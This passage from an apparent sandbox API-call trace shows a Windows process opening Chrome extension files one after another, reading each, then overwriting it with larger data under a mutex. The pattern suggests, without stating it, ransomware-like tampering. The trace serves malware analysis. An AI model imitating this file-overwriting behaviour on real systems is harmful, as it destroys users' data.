lpBuffer=0x1ea4ba8, nNumberOfBytesToRead=0xea, lpNumberOfBytesRead=0x2fdf2bc, lpOverlapped=0x0 | out: lpBuffer=0x1ea4ba8*, lpNumberOfBytesRead=0x2fdf2bc*=0xea, lpOverlapped=0x0) returned 1 [0168.433] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf300*=0) returned 0x0 [0168.433] WriteFile (in: hFile=0x1fc, lpBuffer=0x25a5dd8*, nNumberOfBytesToWrite=0x672, lpNumberOfBytesWritten=0x2fdf2d0, lpOverlapped=0x0 | out: lpBuffer=0x25a5dd8*, lpNumberOfBytesWritten=0x2fdf2d0*=0x672, lpOverlapped=0x0) returned 1 [0168.434] CloseHandle (hObject=0x1fc) returned 1 [0168.434] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\fil\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\fil\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1fc [0168.435] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0168.435] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0xe0 [0168.435] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0168.435] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0168.436] ReleaseMutex (hMutex=0x168) returned 1 [0168.436] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0168.436] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x1f7344c, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="messages.json", lpUsedDefaultChar=0x0) returned 13 [0168.436] ReadFile (in: hFile=0x1fc, lpBuffer=0x26c4aa8, nNumberOfBytesToRead=0xe0, lpNumberOfBytesRead=0x2fdf2bc, lpOverlapped=0x0 | out: lpBuffer=0x26c4aa8*, lpNumberOfBytesRead=0x2fdf2bc*=0xe0, lpOverlapped=0x0) returned 1 [0168.437] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf300*=0) returned 0x0 [0168.437] WriteFile (in: hFile=0x1fc, lpBuffer=0x25a5dd8*, nNumberOfBytesToWrite=0x668, lpNumberOfBytesWritten=0x2fdf2d0, lpOverlapped=0x0 | out: lpBuffer=0x25a5dd8*, lpNumberOfBytesWritten=0x2fdf2d0*=0x668, lpOverlapped=0x0) returned 1 [0168.438] CloseHandle (hObject=0x1fc) returned 1 [0168.438] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ko\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ko\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1fc [0168.439] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0168.439] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0xe6 [0168.439] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0168.439] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0168.440] ReleaseMutex (hMutex=0x168) returned 1 [0168.440] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0168.440] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x1f7340c, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="messages.json", lpUsedDefaultChar=0x0) returned 13 [0168.440] ReadFile (in: hFile=0x1fc, lpBuffer=0x1ea4ba8, nNumberOfBytesToRead=0xe6, lpNumberOfBytesRead=0x2fdf2bc, lpOverlapped=0x0 | out: lpBuffer=0x1ea4ba8*, lpNumberOfBytesRead=0x2fdf2bc*=0xe6, lpOverlapped=0x0) returned 1 [0168.441] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf300*=0) returned 0x0 [0168.441] WriteFile (in: hFile=0x1fc, lpBuffer=0x25a5dd8*, nNumberOfBytesToWrite=0x66e, lpNumberOfBytesWritten=0x2fdf2d0, lpOverlapped=0x0 | out: lpBuffer=0x25a5dd8*, lpNumberOfBytesWritten=0x2fdf2d0*=0x66e, lpOverlapped=0x0) returned 1 [0168.450] CloseHandle (hObject=0x1fc) returned 1 [0168.450] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\pt_PT\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\pt_pt\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1fc [0168.451] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0168.451] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0xe0 [0168.451] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0168.451] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0168.451] ReleaseMutex (hMutex=0x168) returned 1 [0168.451] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0168.451] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x1f7344c, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="messages.json", lpUsedDefaultChar=0x0) returned 13 [0168.451] ReadFile (in: hFile=0x1fc, lpBuffer=0x26c4aa8, nNumberOfBytesToRead=0xe0, lpNumberOfBytesRead=0x2fdf2bc, lpOverlapped=0x0 | out: lpBuffer=0x26c4aa8*, lpNumberOfBytesRead=0x2fdf2bc*=0xe0, lpOverlapped=0x0) returned 1 [0168.452] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf300*=0) returned 0x0 [0168.452] WriteFile (in: hFile=0x1fc, lpBuffer=0x2840958*, nNumberOfBytesToWrite=0x668, lpNumberOfBytesWritten=0x2fdf2d0, lpOverlapped=0x0 | out: lpBuffer=0x2840958*, lpNumberOfBytesWritten=0x2fdf2d0*=0x668, lpOverlapped=0x0) returned 1 [0168.453] CloseHandle (hObject=0x1fc) returned 1 [0168.453] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\tr\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\tr\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1fc [0168.453] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0168.453] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0xdd [0168.454] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0168.454] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0168.454] ReleaseMutex (hMutex=0x168) returned 1 [0168.454] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0168.454] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x1f7340c, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="messages.json", lpUsedDefaultChar=0x0) returned 13 [0168.454] ReadFile (in: hFile=0x1fc, lpBuffer=0x26c4aa8, nNumberOfBytesToRead=0xdd, lpNumberOfBytesRead=0x2fdf2bc, lpOverlapped=0x0 | out: lpBuffer=0x26c4aa8*, lpNumberOfBytesRead=0x2fdf2bc*=0xdd, lpOverlapped=0x0) returned 1 [0168.455] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf300*=0) returned 0x0 [0168.455] WriteFile (in: hFile=0x1fc, lpBuffer=0x2840958*, nNumberOfBytesToWrite=0x665, lpNumberOfBytesWritten=0x2fdf2d0, lpOverlapped=0x0 | out: lpBuffer=0x2840958*, lpNumberOfBytesWritten=0x2fdf2d0*=0x665, lpOverlapped=0x0) returned 1 [0168.455] CloseHandle (hObject=0x1fc) returned 1 [0168.456] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\icon_16.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\icon_16.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1fc [0168.456] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0168.456] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x8f [0168.456] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0168.456] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0168.456] ReleaseMutex (hMutex=0x168) returned 1 [0168.457] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="icon_16.png", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0168.457] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="icon_16.png", cchWideChar=11, lpMultiByteStr=0x1f7344c, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="icon_16.png", lpUsedDefaultChar=0x0) returned 11 [0168.457] ReadFile (in: hFile=0x1fc, lpBuffer=0x1f6e578, nNumberOfBytesToRead=0x8f, lpNumberOfBytesRead=0x2fdf2bc, lpOverlapped=0x0 | out: lpBuffer=0x1f6e578*, lpNumberOfBytesRead=0x2fdf2bc*=0x8f, lpOverlapped=0x0) returned 1 [0168.458] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf300*=0) returned 0x0 [0168.458] WriteFile (in: hFile=0x1fc, lpBuffer=0x26cf6b8*, nNumberOfBytesToWrite=0x617, lpNumberOfBytesWritten=0x2fdf2d0, lpOverlapped=0x0 | out: lpBuffer=0x26cf6b8*, lpNumberOfBytesWritten=0x2fdf2d0*=0x617, lpOverlapped=0x0) returned 1 [0168.458] CloseHandle (hObject=0x1fc) returned 1 [0168.458] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\da\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\da\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1fc [0168.459] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0168.459] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0xd8 [0168.459] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0168.459] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0168.459] ReleaseMutex (hMutex=0x168) returned 1 [0168.459] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0168.460] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x1f7340c, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="messages.json", lpUsedDefaultChar=0x0) returned 13 [0168.460] ReadFile (in: hFile=0x1fc, lpBuffer=0x26c4aa8, nNumberOfBytesToRead=0xd8, lpNumberOfBytesRead=0x2fdf2bc, lpOverlapped=0x0 | out: lpBuffer=0x26c4aa8*, lpNumberOfBytesRead=0x2fdf2bc*=0xd8, lpOverlapped=0x0) returned 1 [0168.464] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf300*=0) returned 0x0 [0168.464] WriteFile (in: hFile=0x1fc, lpBuffer=0x26cf6b8*, nNumberOfBytesToWrite=0x660, lpNumberOfBytesWritten=0x2fdf2d0, lpOverlapped=0x0 | out: lpBuffer=0x26cf6b8*, lpNumberOfBytesWritten=0x2fdf2d0*=0x660, lpOverlapped=0x0) returned 1 [0168.464] CloseHandle (hObject=0x1fc) returned 1 [0168.465] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\fi\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\fi\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1fc [0168.466] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0168.466] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0xd8 [0168.466] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0168.466] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0168.466] ReleaseMutex (hMutex=0x168) returned 1 [0168.466] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0168.466] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x1f7352c, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="messages.json", lpUsedDefaultChar=0x0) returned 13 [0168.466] ReadFile (in: hFile=0x1fc, lpBuffer=0x26c4aa8, nNumberOfBytesToRead=0xd8, lpNumberOfBytesRead=0x2fdf2bc, lpOverlapped=0x0 | out: lpBuffer=0x26c4aa8*, lpNumberOfBytesRead=0x2fdf2bc*=0xd8, lpOverlapped=0x0) returned 1 [0168.468] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf300*=0) returned 0x0 [0168.468] WriteFile (in: hFile=0x1fc, lpBuffer=0x26cf6b8*, nNumberOfBytesToWrite=0x660, lpNumberOfBytesWritten=0x2fdf2d0, lpOverlapped=0x0 | out: lpBuffer=0x26cf6b8*, lpNumberOfBytesWritten=0x2fdf2d0*=0x660, lpOverlapped=0x0) returned 1 [0168.468] CloseHandle (hObject=0x1fc) returned 1 [0168.468] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ja\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ja\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1fc [0168.469] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0168.469] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0xdd [0168.469] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0168.470] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0168.470] ReleaseMutex (hMutex=0x168) returned 1 [0168.470] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0168.470] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x1f7340c, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="messages.json", lpUsedDefaultChar=0x0) returned 13 [0168.470] ReadFile (in: hFile=0x1fc, lpBuffer=0x26c4aa8, nNumberOfBytesToRead=0xdd, lpNumberOfBytesRead=0x2fdf2bc, lpOverlapped=0x0 | out: lpBuffer=0x26c4aa8*, lpNumberOfBytesRead=0x2fdf2bc*=0xdd, lpOverlapped=0x0) returned 1 [0168.471] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf300*=0) returned 0x0 [0168.472] WriteFile (in: hFile=0x1fc, lpBuffer=0x2840958*, nNumberOfBytesToWrite=0x665, lpNumberOfBytesWritten=0x2fdf2d0, lpOverlapped=0x0 | out: lpBuffer=0x2840958*, lpNumberOfBytesWritten=0x2fdf2d0*=0x665, lpOverlapped=0x0) returned 1 [0168.472] CloseHandle (hObject=0x1fc) returned 1 [0168.472] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\pt_BR\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\pt_br\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1fc [0168.473] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0168.473] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0xce [0168.473] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0168.474] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0168.474] ReleaseMutex (hMutex=0x168) returned 1 [0168.474] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0168.474] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x1f7352c, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="messages.json", lpUsedDefaultChar=0x0) returned 13 [0168.474] ReadFile (in: hFile=0x1fc, lpBuffer=0x1ed1838, nNumberOfBytesToRead=0xce, lpNumberOfBytesRead=0x2fdf2bc, lpOverlapped=0x0 | out: lpBuffer=0x1ed1838*, lpNumberOfBytesRead=0x2fdf2bc*=0xce, lpOverlapped=0x0) returned 1 [0168.475] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf300*=0) returned 0x0 [0168.475] WriteFile (in: hFile=0x1fc, lpBuffer=0x26cf6b8*, nNumberOfBytesToWrite=0x656, lpNumberOfBytesWritten=0x2fdf2d0, lpOverlapped=0x0 | out: lpBuffer=0x26cf6b8*, lpNumberOfBytesWritten=0x2fdf2d0*=0x656, lpOverlapped=0x0) returned 1 [0168.476] CloseHandle (hObject=0x1fc) returned 1 [0168.476] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\th\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\th\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1fc [0168.477] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0168.477] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0xfe [0168.477] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0168.477] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0168.477] ReleaseMutex (hMutex=0x168) returned 1 [0168.478] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0169.787] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, 